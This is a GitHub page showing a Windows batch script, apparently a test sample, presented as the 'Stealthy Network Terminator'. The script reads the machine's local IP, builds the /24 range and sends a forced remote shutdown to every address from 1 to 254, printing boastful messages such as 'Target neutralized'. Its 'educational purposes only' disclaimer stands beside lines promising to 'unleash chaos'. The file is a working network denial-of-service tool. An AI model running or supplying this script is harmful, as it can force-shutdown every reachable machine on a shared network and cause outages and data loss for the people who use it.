-
Notifications
You must be signed in to change notification settings - Fork 0
/
00240021_test_file.bat
57 lines (46 loc) · 1.73 KB
/
00240021_test_file.bat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
@echo off
setlocal enabledelayedexpansion
REM Stealthy Network Terminator - Developed by FLUFFY
REM This script is for educational purposes only. Misuse for malicious intent is illegal.
REM FLUFFY presents the Stealthy Network Terminator (SNT), a potent tool for hacking enthusiasts.
REM It silently infiltrates your local network, wreaking havoc with a single click.
REM WARNING: Use this tool responsibly and only on networks you own or have explicit permission to test.
REM Get ready to unleash chaos! Initiating SNT...
REM Get local IP address
for /f "tokens=2 delims=:" %%i in ('ipconfig ^| findstr IPv4') do (
set "local_ip=%%i"
)
if "%local_ip%"=="" (
echo Failed to retrieve local IP address. Aborting operation.
exit /b 1
)
REM Extract network range
for /f "tokens=1,2,3 delims=." %%a in ("!local_ip!") do (
set "network_range=%%a.%%b.%%c."
)
if "%network_range%"=="" (
echo Failed to extract network range. Aborting operation.
exit /b 1
)
REM Initiating shutdown sequence for all devices in the network range
echo Stealth mode activated... Engaging the SNT...
set "error_count=0"
for /L %%i in (1,1,254) do (
set "ip=!network_range!%%i"
shutdown /s /f /t 0 /m \\!ip! >nul 2>&1
if errorlevel 1 (
echo Failed to send shutdown command to !ip!... Evading detection.
set /a "error_count+=1"
) else (
echo Shutdown command sent to !ip!... Target neutralized.
)
)
REM Display summary
echo.
if %error_count% gtr 0 (
echo %error_count% devices failed to shut down... Potential resistance detected.
) else (
echo All devices in the network range have received shutdown command... Network domination achieved!
)
echo Terminating SNT... Exit stealth mode and return to the shadows.
pause